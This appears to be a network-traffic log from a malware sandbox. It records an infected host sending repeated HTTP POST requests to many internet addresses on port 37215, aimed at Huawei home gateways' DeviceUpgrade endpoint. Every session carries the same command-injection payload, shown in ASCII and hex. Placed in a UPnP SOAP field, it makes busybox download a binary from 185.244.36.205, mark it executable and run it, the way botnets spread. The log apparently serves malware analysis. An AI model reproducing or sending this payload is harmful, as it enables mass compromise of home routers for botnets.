                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2182192.168.2.1538168181.37.86.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129738092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2183192.168.2.1552628157.114.79.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129846096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2184192.168.2.1548806181.98.125.11237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129935026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2185192.168.2.155812431.179.94.7737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130072117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2186192.168.2.1553776156.55.218.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130075932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2187192.168.2.1550506186.113.246.17637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130075932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2188192.168.2.1550294197.83.177.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130218029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2189192.168.2.1557632197.157.112.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130551100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2190192.168.2.1544100186.118.159.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130599976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2191192.168.2.1559368156.197.125.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130601883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192192.168.2.1550082102.119.105.17137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130630016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
